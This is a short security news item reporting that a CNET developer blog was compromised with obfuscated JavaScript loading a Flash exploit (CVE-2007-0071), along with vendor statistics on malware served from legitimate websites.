Malicious Javascript Code In Another CNET Networks Website
Websense has discovered that another CNET Networks site, CNET Clientside Developer Blog, has been compromised, just 5 months after previous incident. The main page of this website contains malicious JavaScript code that de-obfuscates into an iframe that loads its primary malicious payload from a different host. This malicious JavaScript code attempts to access the live exploit URL from a .info domain that is now down.
The malicious code is observed to exploit a known integer overflow vulnerability in Adobe Flash (CVE-2007-0071). At the time of this alert, the site is still hosting the malicious code. Visitors who are not patched against this vulnerability will be infected without any user interaction.
The Clientside developer blog which has been embedded with a malicious JavaScript code attempting to exploit the visitors through a well known vulnerability in Adobe Flash’s player. Software vulnerable to this attack includes Adobe Flash Player version 9.0.115.0 and previous, Adobe Flex 3.0, Adobe AIR 1.0.
This malware attack is not as an isolated event. Lately, the attack where legitimate sites are starting to serve malware and exploits became very popular. Multiple vendors are confirming this trend: in its latest report, ScanSafe found 407 percent increase in compromise of legitimate websites, according to Sophos 79 percent of malware-hosting Web sites are legitimate ones, according to Websense more than 75 percent of the Web sites classified as malicious were actually legitimate ones. Those studies show that the old security advise “stay away from unknown websites” would soon become irrelevant.
More on CyberInsecure:
Leave a Reply
Comments with unsolicited links to other resources will be marked as spam. DO NOT leave links in comments. Please leave your real email, it wont be published.